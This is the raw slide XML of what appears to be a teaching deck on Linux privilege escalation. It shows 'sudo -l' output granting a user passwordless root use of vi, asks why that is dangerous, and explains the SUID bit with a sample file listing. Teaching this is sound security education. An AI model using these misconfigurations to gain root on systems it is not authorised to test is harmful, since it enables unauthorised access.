                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BEDB464-90C4-3144-BA9F-BE3AF669F04D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5266724" y="177800"/>
            <a:ext cx="6502400" cy="6502400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="174660160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extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3516401172"/>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48984F13-E42B-984B-B0D2-9374BFD47D65}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="642258" y="634946"/>
            <a:ext cx="3869339" cy="946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3600"/>
              <a:t>Privilege Escalation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1708784359"/>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8" y="634946"/>
            <a:ext cx="3869339" cy="946719"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600"/>
              <a:t>Privilege Escalation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extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="315719636"/>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902A815D-46F4-5943-A72F-03F8D0470AAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4816269" y="1043427"/>
            <a:ext cx="6630231" cy="1622135"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>File generated by SUDO that shows what users have what </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> permissions. Can be viewed for your user with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> –l </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(that’s an “L”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>User </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>testuser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t> may run the following commands on kali: 	(root) NOPASSWD: /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>/bin/vi /var/www/html/*</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29643781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71AD3-2C2E-D34C-8C32-87B266CADE4E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="642259" y="634946"/>
            <a:ext cx="3372529" cy="5055904"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>The Process</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="31" name="Straight Connector 3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7" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{026A0CE3-EF81-46F4-BB0E-DB7DD7741FDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2761189539"/>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419571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8" y="634946"/>
            <a:ext cx="3869339" cy="946719"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600"/>
              <a:t>Privilege Escalation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902A815D-46F4-5943-A72F-03F8D0470AAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4816269" y="1043426"/>
            <a:ext cx="6630231" cy="2967857"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>File generated by SUDO that shows what users have what </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> permissions. Can be viewed for your user with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> –l </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(that’s an “L”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>User </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>testuser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t> may run the following commands on kali: 	(root) NOPASSWD: /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>/bin/vi /var/www/html/*</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>As </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ROOT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NO PASSWORD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>necessary, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>testuser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> can run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/bin/vi /var/www/html/*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Why is this dangerous?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="57836226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642258" y="634946"/>
            <a:ext cx="3869339" cy="946719"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600"/>
              <a:t>Privilege Escalation</a:t>
            </a:r>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902A815D-46F4-5943-A72F-03F8D0470AAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4816269" y="1043426"/>
            <a:ext cx="6630231" cy="2967857"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>File generated by SUDO that shows what users have what </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> permissions. Can be viewed for your user with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> –l </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(that’s an “L”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>User </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>testuser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t> may run the following commands on kali: 	(root) NOPASSWD: /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>/bin/vi /var/www/html/*</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>As </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ROOT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NO PASSWORD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>necessary, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>testuser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> can run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/bin/vi /var/www/html/*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Why is this dangerous?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Privilege Escalation with Sudoer and vi">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8488FAB-16D3-2A41-ACDB-4E4FA83A2543}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5238910" y="3734218"/>
            <a:ext cx="5784947" cy="2371828"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="421359364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extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2744105929"/>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1C88BD24-E967-DA45-8B01-B23FE36A24C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="642258" y="634946"/>
            <a:ext cx="3869339" cy="946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3600"/>
              <a:t>Privilege Escalation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9234899-DF7C-2F4E-88C7-F51753148CCB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4707772" y="1566641"/>
            <a:ext cx="6630231" cy="2967857"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SUID: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>et owner </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ser </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> on execution.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If this bit is set, the file is executed with the permissions of the OWNER, not the user executing the file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1"/>
              <a:t>rwsr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>-x--- 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>somebinary</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
